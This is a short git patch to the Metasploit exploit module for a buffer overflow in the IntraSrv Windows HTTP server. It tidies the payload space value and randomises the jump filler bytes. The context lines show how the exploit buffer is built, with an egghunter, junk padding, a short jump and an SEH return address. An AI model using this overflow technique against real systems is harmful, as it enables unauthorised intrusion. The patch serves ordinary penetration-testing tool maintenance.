From 49bcec5c926e08d89e2e61d112d073d8dce21365 Mon Sep 17 00:00:00 2001
From: Nathan Einwechter
Date: Mon, 12 Aug 2013 18:20:03 -0400
Subject: [PATCH] Additional cleanup

---
 modules/exploits/windows/http/intrasrv_bof.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/windows/http/intrasrv_bof.rb b/modules/exploits/windows/http/intrasrv_bof.rb
index ca082b2606..f7896a74f5 100644
--- a/modules/exploits/windows/http/intrasrv_bof.rb
+++ b/modules/exploits/windows/http/intrasrv_bof.rb
@@ -37,7 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote
 ],
 'Payload' =>
 {
- 'Space' => '4660',
+ 'Space' => 4660,
 'StackAdjustment' => -3500,
 'BadChars' => "\x00"
 },
@@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote
 buf = rand_text(target['Offset']-126) # junk to egghunter at jmp -128
 buf << hunter # egghunter
 buf << rand_text(target['Offset']-buf.length) # more junk to offset
- buf << "\xeb\x80\x90\x90" # nseh - jmp -128 to egghunter
+ buf << "\xeb\x80" + rand_text(2) # nseh - jmp -128 to egghunter
 buf << [target.ret].pack("V*") # seh
 # second last byte of payload/egg gets corrupted - pad 2 bytes